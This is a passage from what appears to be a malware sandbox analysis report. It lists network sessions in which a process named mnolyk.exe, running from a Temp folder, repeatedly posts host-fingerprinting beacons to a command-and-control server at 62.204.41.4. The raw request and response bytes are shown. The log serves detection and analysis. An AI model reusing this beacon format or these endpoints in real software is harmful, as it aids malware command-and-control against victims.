                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:20.648364067 CET457INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:20 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          317192.168.2.65004062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:20.818779945 CET458OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:20.881772995 CET458INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:20 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          318192.168.2.65004162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:21.067703009 CET459OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:21.132908106 CET459INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:21 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          319192.168.2.65004262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:21.298484087 CET460OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:21.361246109 CET460INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:21 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          32192.168.2.64975062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:00:58.621944904 CET137OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:00:58.685926914 CET137INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:00:58 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          320192.168.2.65004362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:21.535773993 CET461OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:21.598689079 CET461INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:21 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          321192.168.2.65004462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:21.772716045 CET462OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:21.835486889 CET462INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:21 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          322192.168.2.65004562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:22.023469925 CET463OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:22.087369919 CET463INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:22 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          323192.168.2.65004662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:22.274271011 CET464OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:22.339755058 CET464INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:22 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          324192.168.2.65004762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:22.518279076 CET465OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:22.581559896 CET465INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:22 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          325192.168.2.65004862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:22.753627062 CET466OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:22.817059040 CET466INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:22 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          326192.168.2.65004962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:23.003140926 CET467OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:23.067365885 CET467INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:23 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          327192.168.2.65005062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:23.248250008 CET468OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:23.312478065 CET468INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:23 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          328192.168.2.65005162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:23.494294882 CET469OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:23.559998035 CET469INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:23 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          329192.168.2.65005262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:23.740042925 CET470OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:23.802834988 CET470INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:23 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          33192.168.2.64975162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:00:58.872163057 CET138OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:00:58.934767008 CET138INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:00:58 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          330192.168.2.65005362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:24.008848906 CET471OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:24.073893070 CET471INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:24 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          331192.168.2.65005462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:24.270996094 CET472OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:24.336196899 CET472INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:24 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          332192.168.2.65005562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:24.503968954 CET473OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:24.568763018 CET473INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:24 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          333192.168.2.65005662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:24.870217085 CET474OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:24.933780909 CET474INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:24 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          334192.168.2.65005762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:25.359863043 CET475OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:25.425580025 CET475INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:25 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          335192.168.2.65005862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:25.697906017 CET476OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
